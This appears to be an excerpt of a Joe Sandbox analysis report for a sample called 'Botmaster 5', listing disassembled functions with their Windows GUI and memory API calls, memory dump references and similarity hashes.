                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Library$AddressLoadProc$Freememset
                                                                                                                                                                                                                  • String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
                                                                                                                                                                                                                  • API String ID: 2337797191-2634860346
                                                                                                                                                                                                                  • Opcode ID: 1503af418337552a2d52681d447f37cfec1dbb1cf7cefe97ccab5f93c1b3d28a
                                                                                                                                                                                                                  • Instruction ID: 697213608547b77493d88f723d66804edcf82b63df4823466286e33667dada9c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1503af418337552a2d52681d447f37cfec1dbb1cf7cefe97ccab5f93c1b3d28a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14118771A1036ABADB109FA9AC04B9A77F89B04749F500037D501E2190E7FCD986CFBB
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042104F Relevance: 16.6, APIs: 11, Instructions: 92windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000BB,?,00000000), ref: 0042106B
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000001,00000000), ref: 00421079
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00421090
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004210A0
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,00436984), ref: 004210AC
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004210B6
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004210C3
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,00436984), ref: 004210DA
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,00436984), ref: 0042110F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00421117
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000000,00000000), ref: 00421124
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: e869e5fd2c231bd7571cddbcb431359ddf6bf1857d683e7282d396b0943d3da1
                                                                                                                                                                                                                  • Instruction ID: ea22a01cf5b04709514d66dd7abecd5f03e66b857339fc39eb22da25cf7c8261
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e869e5fd2c231bd7571cddbcb431359ddf6bf1857d683e7282d396b0943d3da1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A217C3024030CBBFA316F61CC85F27BAADEF94798F524A2AF690161E0C7F75C549A65
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00429840 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                  • String ID: +Infinity$-Infinity$English$NaN
                                                                                                                                                                                                                  • API String ID: 2081463915-437089356
                                                                                                                                                                                                                  • Opcode ID: 952009a086f4d759ec4f55360a0e3d65c5f7e86339d26027c1e34873af71ab42
                                                                                                                                                                                                                  • Instruction ID: 9e7bb65beaa06f9aa35050b9e56aa4946bf884987d65067cef5e09b96fa0f954
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 952009a086f4d759ec4f55360a0e3d65c5f7e86339d26027c1e34873af71ab42
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1F0F4F2745233768A107B117D02ACB76585F78318F07A82BFA4462100E3B89D69C1BE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425FAE Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00425FCE
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,0041FE59), ref: 00425FE8
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00426005
                                                                                                                                                                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00426037
                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 00426058
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00426164
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Create$BitsCompatibleDeleteObjectSectionmemset
                                                                                                                                                                                                                  • String ID: $(
                                                                                                                                                                                                                  • API String ID: 2253634444-55695022
                                                                                                                                                                                                                  • Opcode ID: 574922f6418939a85c1e24498c5c3df7287413b35383163b2c8d416a18958cdc
                                                                                                                                                                                                                  • Instruction ID: 25fc69edab547b187fac4650ad53ee9871d052d0a4fc2d82bbd46f350ecc4c39
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 574922f6418939a85c1e24498c5c3df7287413b35383163b2c8d416a18958cdc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5512472A00168EFCB008F95D9948EEFFF9EF05300F5580ABE581AB292D2789E54DB54
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00422414 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 148COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00422446
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: EnabledWindow
                                                                                                                                                                                                                  • String ID: N$PB_3State
                                                                                                                                                                                                                  • API String ID: 1255321416-1139163894
                                                                                                                                                                                                                  • Opcode ID: 1c6723ffd4db580b96ae9efa1b45aaa32d74a3578d96a74b054ca5a47a23a5e8
                                                                                                                                                                                                                  • Instruction ID: a9aba10f8b52edcc8a954a265b888824c13c1413fdea58bde68ca48e808f6800
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c6723ffd4db580b96ae9efa1b45aaa32d74a3578d96a74b054ca5a47a23a5e8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B551A230700614BFDB218F64EA90B5A77A5AB04324FA0862BF551DB2E1D7F8EDC18B59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004321C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetPropW.USER32(00000000,?), ref: 00432223
                                                                                                                                                                                                                  • GetPropW.USER32(004245A1,?), ref: 00432245
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0043225E
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000028,?,00000000,?), ref: 00432296
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000018,?,00000000,?), ref: 004322B7
                                                                                                                                                                                                                  • SetPropW.USER32(004245A1,?,00000000), ref: 004322C3
                                                                                                                                                                                                                  • SetWindowLongW.USER32(004245A1,000000FC,004320FD), ref: 004322D1
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: HeapProp$Alloc$FreeLongWindow
                                                                                                                                                                                                                  • String ID: PB_GadgetStack_%i
                                                                                                                                                                                                                  • API String ID: 1491099835-1190326050
                                                                                                                                                                                                                  • Opcode ID: 6be74b205faf4e649dd2f1636255ce168e5d6c06873048d3b8826800c2ec93fe
                                                                                                                                                                                                                  • Instruction ID: 0d0b9ed630c9f91388d0bbd6e49e89f888b643cfb4c0e6f357b255e7b740ea49
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6be74b205faf4e649dd2f1636255ce168e5d6c06873048d3b8826800c2ec93fe
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD4168B0600705EFC724CF58DD84A5AFBF8FB18311F10892EE456976A0DBB8A944CF56
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004230EA Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 77windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00423131
                                                                                                                                                                                                                    • Part of subcall function 004235DA: GetPropW.USER32(00000000,00000008), ref: 004235ED
                                                                                                                                                                                                                    • Part of subcall function 004235DA: GetWindowLongW.USER32(?,000000F4), ref: 004235FB
                                                                                                                                                                                                                    • Part of subcall function 004235DA: _strftime.LIBCMT ref: 00423607
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00423159
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_3State), ref: 00423175
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000100,00000020,?), ref: 00423193
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_3State), ref: 004231B9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: PropWindow$CallProc$LongMessageSend_strftime
                                                                                                                                                                                                                  • String ID: $ $PB_3State
                                                                                                                                                                                                                  • API String ID: 1429316384-2382275540
                                                                                                                                                                                                                  • Opcode ID: 0cade12322281c7220534626ad7758559da3495aea8f80a52db2227b10987780
                                                                                                                                                                                                                  • Instruction ID: 16a7523fec3cc840ee52da80546bad2974aa8795db9d04bf6df89d471faa30f8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cade12322281c7220534626ad7758559da3495aea8f80a52db2227b10987780
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05216036600229BBDF119F69FC44BBB7678FB04B02F444526FA01A6255D7BCCE608B99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00428650 Relevance: 13.8, APIs: 9, Instructions: 254COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: wcsncpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 322933527-0
                                                                                                                                                                                                                  • Opcode ID: c3ce49776f5d8dfd277497e476f124f2c6622903bd394678294289328b52b7a8
                                                                                                                                                                                                                  • Instruction ID: dfb21749095569e97bfe03e7c16f0474ebf9a87dfcb3019a7a8d6d5c326dd89c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3ce49776f5d8dfd277497e476f124f2c6622903bd394678294289328b52b7a8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A81BF716052219BC710AF19A94166FB3F4EFD4348F94492EFC8593310EB79ED06C79A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00410550 Relevance: 13.7, APIs: 9, Instructions: 194memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocHeap$freadfseek$_setjmp3ftell
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2751692444-0
                                                                                                                                                                                                                  • Opcode ID: eb04018ad188923dde29d30e06b8d9472e7205ec45cd8f8783384dedc19fb544
                                                                                                                                                                                                                  • Instruction ID: 7487cd6f1fdb22946c9df0fc72250154aec4f2769a36be5585aaa9971138495d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb04018ad188923dde29d30e06b8d9472e7205ec45cd8f8783384dedc19fb544
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70617CB5A00704AFD720DFAAC881E9BB3E9FB48314F10861EE94997791D7B4E881CF55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004219A9 Relevance: 13.6, APIs: 9, Instructions: 62windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004219C4
                                                                                                                                                                                                                  • GetWindow.USER32(?,00000003), ref: 004219D0
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004219DB
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004219E4
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 004219F7
                                                                                                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 004219FC
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00421A07
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00421A1B
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00421A30
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Long$MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1593136606-0
                                                                                                                                                                                                                  • Opcode ID: 3e2c8febc3338f7ed06ff852e64e2e789c006efd34f7a4242da20548ed6e0ea2
                                                                                                                                                                                                                  • Instruction ID: 7342d681f5af8d9c5230b1eb1ea0dae6b61c85787377c1fe856b6ff62ec4aeb5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e2c8febc3338f7ed06ff852e64e2e789c006efd34f7a4242da20548ed6e0ea2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D018831745225BBDA115718AC40FAB739CEF57760F114222F510A62F0DAF56D41C6AE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042298E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117windowmemoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004225E3: SendMessageW.USER32(00000000,0000110A,00000000,00000000), ref: 004225F7
                                                                                                                                                                                                                    • Part of subcall function 004225E3: SendMessageW.USER32(00000000,0000110A,00000003,?), ref: 0042260B
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,?), ref: 00422A0C
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 00422A1F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00422A33
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,?), ref: 00422A57
                                                                                                                                                                                                                  • memmove.MSVCRT ref: 00422A82
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000008,00000000,000000E7), ref: 00422ABD
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$AllocHeapmemmove
                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                  • API String ID: 3670824896-2766056989
                                                                                                                                                                                                                  • Opcode ID: be39ff844703cc0df6453db1c71739fc9ae3821c4bb035db8954da86f55c4957
                                                                                                                                                                                                                  • Instruction ID: 6c687abd837e871aab888f0a05129aad476d293ed9f02569f2fcfaa903d9d289
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be39ff844703cc0df6453db1c71739fc9ae3821c4bb035db8954da86f55c4957
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641AE75B00605FFCB20CFA9DD81A9DBBF5BF48344F50402AE682AB651D2B4EA41CB94
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

